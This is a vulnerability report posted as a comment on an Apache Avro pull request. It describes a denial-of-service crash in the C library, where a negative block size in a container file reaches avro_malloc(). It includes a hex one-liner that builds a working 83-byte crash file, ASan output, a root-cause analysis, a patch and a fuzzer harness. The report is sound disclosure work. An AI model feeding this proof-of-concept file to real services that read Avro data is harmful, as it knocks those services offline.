OwenSanzas commented on PR #3623: URL: https://github.com/apache/avro/pull/3623#issuecomment-3746385334
Thanks for the reply! Here is the context of the crash we found:

## Description

Negative block size in Avro container file (OCF) causes `allocation-size-too-big` crash in `file_read_block_count()`. The function reads block size using varint/zigzag encoding which can represent negative numbers, but does not validate before passing to `avro_malloc()`.

## Version

- Apache Avro C library
- Tested on: current main branch
- Commit: HEAD

## Steps to Reproduce

### Method 1: Using avrocat (Easiest)

**Step 1**: Build Avro C library with AddressSanitizer:

```bash
git clone https://github.com/apache/avro.git
cd avro/lang/c
mkdir build && cd build
cmake .. \
  -DCMAKE_C_COMPILER=clang \
  -DCMAKE_C_FLAGS="-fsanitize=address -g -O1" \
  -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
make -j$(nproc)
```

**Step 2**: Create the malicious Avro container file (83 bytes):

```bash
# One-liner to create poc.avro
echo '4f626a0104166176726f2e736368656d611e7b2274797065223a226e756c6c227d146176726f2e636f646563086e756c6c000102030405060708090a0b0c0d0e0f10000102030405060708090a0b0c0d0e0f10' | xxd -r -p > poc.avro
```

**Step 3**: Trigger the crash:

```bash
./src/avrocat poc.avro
```

### Method 2: Using the fuzzer

**Step 1**: Build Avro C library with AddressSanitizer (same as above).

**Step 2**: Save the fuzzer code below as `datafile_fuzzer.c`.

**Step 3**: Build the fuzzer:

```bash
clang -g -O1 -fsanitize=address,fuzzer \
  -I../src \
  datafile_fuzzer.c \
  -L./src -lavro \
  -Wl,-rpath,./src \
  -o datafile_fuzzer
```

**Step 4**: Create PoC and run:

```bash
echo '4f626a0104166176726f2e736368656d611e7b2274797065223a226e756c6c227d146176726f2e636f646563086e756c6c000102030405060708090a0b0c0d0e0f10000102030405060708090a0b0c0d0e0f10' | xxd -r -p > poc.avro
./datafile_fuzzer poc.avro
```

## Expected Behavior

The Avro C library should validate that block size is non-negative and return an error for malformed files.
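To make the expected behavior concrete, here is a minimal standalone sketch of zigzag varint decoding followed by a non-negative check. It does not use the Avro C API: the helper names `decode_zigzag_varint` and `checked_block_size` are hypothetical and exist only for illustration, and the real library reads through its own `read_long()` encoder.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical helper (not part of Avro C): decode one zigzag-encoded
 * varint from buf. Returns the number of bytes consumed, or 0 if the
 * input is truncated or longer than 10 bytes.
 */
static size_t decode_zigzag_varint(const uint8_t *buf, size_t len, int64_t *out)
{
    uint64_t raw = 0;
    size_t i;

    for (i = 0; i < len && i < 10; i++) {
        /* Each byte carries 7 payload bits, least significant group first. */
        raw |= (uint64_t)(buf[i] & 0x7f) << (7 * i);
        if ((buf[i] & 0x80) == 0) {
            /* Zigzag: the low bit selects the sign, the rest is the magnitude. */
            *out = (int64_t)(raw >> 1) ^ -(int64_t)(raw & 1);
            return i + 1;
        }
    }
    return 0;
}

/*
 * Hypothetical helper (not part of Avro C): reject decoded sizes that are
 * negative or do not fit in size_t before they reach an allocator.
 */
static int checked_block_size(int64_t decoded, size_t *size_out)
{
    if (decoded < 0 || (uint64_t)decoded > SIZE_MAX) {
        return EINVAL;
    }
    *size_out = (size_t)decoded;
    return 0;
}
```

Feeding the single byte `0x01` to `decode_zigzag_varint` yields `-1`, which `checked_block_size` rejects with `EINVAL` instead of letting it be converted to a huge unsigned allocation size.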

## Actual Behavior

```
==PID==ERROR: AddressSanitizer: requested allocation size 0xffffffffffffffff (0x800 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)
    #0 0x... in realloc (...)
    #1 0x... in file_read_block_count /path/to/avro/lang/c/src/datafile.c:459:35
    #2 0x... in avro_file_reader_fp /path/to/avro/lang/c/src/datafile.c:529:9
    ...
SUMMARY: AddressSanitizer: allocation-size-too-big ... in realloc
```

## Root Cause Analysis

In `lang/c/src/datafile.c:452-459`, the `file_read_block_count()` function reads block size using zigzag-encoded varint:

```c
static int file_read_block_count(avro_file_reader_t r)
{
    int64_t len;
    ...
    check_prefix(rval, enc->read_long(r->reader, &len),
                 "Cannot read file block size: ");

    if (!r->current_blockdata) {
        r->current_blockdata = (char *) avro_malloc(len);  // BUG: len can be negative!
        ...
    }
}
```

**Control flow for crash file:**

1. File header parsed successfully (valid "Obj\x01" magic, schema, codec, sync marker)
2. `file_read_block_count()` called at line 529
3. `read_long()` reads block_count from byte 0x00 at offset 0x42 → decoded = 0
4. `read_long()` reads block_size from byte 0x01 at offset 0x43
5. Zigzag decode: `(1 >> 1) ^ -(1 & 1) = 0 ^ -1 = -1`
6. `avro_malloc(-1)` → `avro_malloc(0xFFFFFFFFFFFFFFFF)` → CRASH

**File structure of PoC:**

```
Offset  Bytes         Description
------  -----         -----------
00-03:  4f 62 6a 01   Magic "Obj\x01"
04-31:  ...           Metadata map (schema={"type":"null"}, codec=null)
32-41:  ...           Sync marker (16 bytes)
42:     00            block_count varint (decoded = 0)
43:     01            block_size varint (zigzag decode = -1)  <- TRIGGER
```

## Impact

- **DoS**: Application crash via allocation failure
- **CWE-789**: Memory Allocation with Excessive Size Value
- **Affected**: Any application using Avro C library to read untrusted `.avro` files

Attack vectors:

- Data analytics platforms accepting user uploads
- ETL pipelines processing external data
- Message queue consumers (Kafka with Avro)
- Any service that reads Avro container files

## Suggested Fix

> **Note**: This is a quick fix for this specific vulnerability. A comprehensive audit of all `read_long()` call sites that use decoded values for memory allocation is recommended, as similar issues may exist elsewhere in the codebase.

Add validation for negative block size in `file_read_block_count()`:

```c
static int file_read_block_count(avro_file_reader_t r)
{
    int64_t len;
    ...
    check_prefix(rval, enc->read_long(r->reader, &len),
                 "Cannot read file block size: ");

    if (len < 0) {
        avro_set_error("Invalid block size: %" PRId64, len);
        return EINVAL;
    }

    if (!r->current_blockdata) {
        r->current_blockdata = (char *) avro_malloc(len);
        ...
    }
}
```

## Fuzzer

This issue was discovered using a custom Avro datafile fuzzer:

```c
/*
 * Copyright 2026 O2Lab @ Texas A&M University
 *
 * Fuzzer for Avro C DataFile Reader
 * Target: avro_file_reader_fp() and avro_file_reader_read_value()
 */

#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <avro.h>

int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    if (size < 4) {
        return 0;
    }

    /* Write fuzz data to a temporary file */
    char template[] = "/tmp/avro_fuzz_XXXXXX";
    int fd = mkstemp(template);
    if (fd < 0) {
        return 0;
    }

    ssize_t written = write(fd, data, size);
    if (written != (ssize_t)size) {
        close(fd);
        unlink(template);
        return 0;
    }

    lseek(fd, 0, SEEK_SET);

    FILE *fp = fdopen(fd, "rb");
    if (fp == NULL) {
        close(fd);
        unlink(template);
        return 0;
    }

    avro_file_reader_t reader = NULL;
    avro_value_iface_t *iface = NULL;
    avro_value_t value;
    int rc;

    rc = avro_file_reader_fp(fp, template, 0, &reader);
    if (rc != 0 || reader == NULL) {
        fclose(fp);
        unlink(template);
        return 0;
    }

    avro_schema_t schema = avro_file_reader_get_writer_schema(reader);
    if (schema == NULL) {
        avro_file_reader_close(reader);
        fclose(fp);
        unlink(template);
        return 0;
    }

    iface = avro_generic_class_from_schema(schema);
    if (iface == NULL) {
        avro_schema_decref(schema);
        avro_file_reader_close(reader);
        fclose(fp);
        unlink(template);
        return 0;
    }

    memset(&value, 0, sizeof(value));
    rc = avro_generic_value_new(iface, &value);
    if (rc != 0) {
        avro_value_iface_decref(iface);
        avro_schema_decref(schema);
        avro_file_reader_close(reader);
        fclose(fp);
        unlink(template);
        return 0;
    }

    /* Read up to 100 values */
    for (int i = 0; i < 100; i++) {
        rc = avro_file_reader_read_value(reader, &value);
        if (rc != 0) {
            break;
        }
        avro_value_reset(&value);
    }

    avro_value_decref(&value);
    avro_value_iface_decref(iface);
    avro_schema_decref(schema);
    avro_file_reader_close(reader);
    fclose(fp);
    unlink(template);

    return 0;
}
```

--
This is an automated message from the Apache Git
Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: [email protected] For queries about this service, please contact Infrastructure at: [email protected]
